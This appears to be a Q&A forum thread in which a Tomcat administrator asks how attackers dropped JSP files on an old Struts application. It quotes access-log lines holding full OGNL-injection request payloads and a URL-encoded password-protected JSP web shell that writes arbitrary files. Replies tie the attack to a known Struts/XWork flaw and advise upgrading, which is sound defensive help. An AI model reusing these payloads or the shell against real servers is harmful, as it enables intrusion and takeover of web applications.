# Java/Tomcat hacked

Tags: java, tomcat

I have had a few files show up on my tomcat server lately that are obviously hacker attempts. I support an older application that uses struts and ibatis along with various other frameworks. Three files were created, a system1.jsp under the actual webapp directory, so like `tomcat/webapps/ROOT/system1.jsp`, and then two other files that were created under `tomcat/webapps/system2.jsp` and `tomcat/webapps/system3.jsp`.

The content of these files strange, it looks like its trying to create a user account, which would seem like a long shot. The way struts was set up there is no way they would actually reach those jsp files anyways, what makes me worry is the fact that they were able to create these files at all. How can I prevent this from happening?

Here is the apache log from the hack, as well as the rest of the code,

```
198.211.11.202 - - [28/Apr/2013:02:05:34 -0500] "GET request!start.do?
('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)
(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i12)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i13)(('\\43xman.getWriter().println(\\43req.getServletContext().getRealPath(%22\\u005c%22))')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(new\\40java.lang.StringBuilder(\\43req.getRealPath(%22\\u005c%22)).append(@java.io.File@separator).append(%22system1.jsp%22).toString())')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E HTTP/1.1" 200 12387
198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43req.getRealPath(%22\\u005c%22))')(d))&(i99)(('\\43xman.getWriter().close()')(d)) HTTP/1.1" 200 29
198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(\\43req.getParameter(%22path%22))')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E&path=/opt/tomcat/webapp/ROOT/system2.jsp HTTP/1.1" 200 12387
```

Comment: What action does `/request!start.do` point to?

Comment: Note that the attempts appear to have come from inside your private subnet.

Answer (score 6, accepted):

I believe the vulnerability listed here matches quite closely what you are seeing:
http://www.exploit-db.com/exploits/14360/

So it seems to be a problem with the Struts/XWork framework and you should look into upgrading that to a newer version. This specific vulnerability reports says that version 2.2.0 fixes this problem.